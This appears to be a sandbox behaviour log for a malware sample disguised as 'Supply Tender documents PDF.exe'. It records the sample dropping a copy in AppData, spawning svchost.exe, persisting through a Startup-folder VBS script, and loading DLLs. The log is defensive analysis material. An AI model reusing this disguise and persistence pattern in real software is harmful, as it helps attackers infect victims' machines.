Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Process created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Process created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Process created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"	Jump to behavior
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Process created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: C:\Windows\SysWOW64\mfpmp.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
